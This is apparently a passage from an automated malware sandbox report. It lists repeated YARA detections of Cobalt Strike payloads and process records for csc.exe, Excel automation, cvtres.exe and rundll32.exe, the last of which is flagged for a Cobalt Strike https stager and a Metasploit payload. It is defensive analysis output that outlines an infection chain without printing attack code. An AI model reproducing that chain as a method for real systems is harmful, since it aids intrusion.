                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508725411.0000000005CBA000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500355385.0000000006DEE000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499979043.0000000006E3A000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000002.568622396.0000000006E13000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500225710.0000000006E0E000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.506934087.00000000060F7000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.506382622.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500146207.0000000006E1E000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.503951630.0000000006608000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500435591.0000000006DDC000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500214700.0000000006E11000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.509015844.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499330598.0000000006CBF000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.505281515.0000000006456000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508508228.0000000005D3A000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.507143214.0000000006072000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.509189150.0000000005BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.507585756.0000000005F67000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.501274310.0000000006AFF000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508358895.0000000005D63000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508666437.0000000005CC0000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500854607.0000000006B80000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.498808453.0000000006D3A000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              Reputation:high

                                                                                                                                              Target ID:26
                                                                                                                                              Start time:14:21:47
                                                                                                                                              Start date:16/06/2022
                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xppvbwul\xppvbwul.cmdline
                                                                                                                                              Imagebase:0x7ff638ba0000
                                                                                                                                              File size:2170976 bytes
                                                                                                                                              MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                                              Reputation:moderate

                                                                                                                                              Target ID:27
                                                                                                                                              Start time:14:21:47
                                                                                                                                              Start date:16/06/2022
                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                              Imagebase:0x9c0000
                                                                                                                                              File size:27110184 bytes
                                                                                                                                              MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Target ID:28
                                                                                                                                              Start time:14:21:49
                                                                                                                                              Start date:16/06/2022
                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES55EE.tmp" "c:\Users\user\AppData\Local\Temp\xppvbwul\CSC578DA5B3682742E2AA363EADA4BD665D.TMP"
                                                                                                                                              Imagebase:0xc60000
                                                                                                                                              File size:43176 bytes
                                                                                                                                              MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Target ID:30
                                                                                                                                              Start time:14:21:57
                                                                                                                                              Start date:16/06/2022
                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              Wow64 process (32bit):
                                                                                                                                              Commandline:C:\Windows\\SysWOW64\\rundll32.exe
                                                                                                                                              Imagebase:
                                                                                                                                              File size:61952 bytes
                                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: Cobaltbaltstrike_RAW_Payload_https_stager_x86, Description: Detects CobaltStrike payloads, Source: 0000001E.00000002.556428060.0000000002CE0000.00000040.00000400.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001E.00000002.556428060.0000000002CE0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                              No disassembly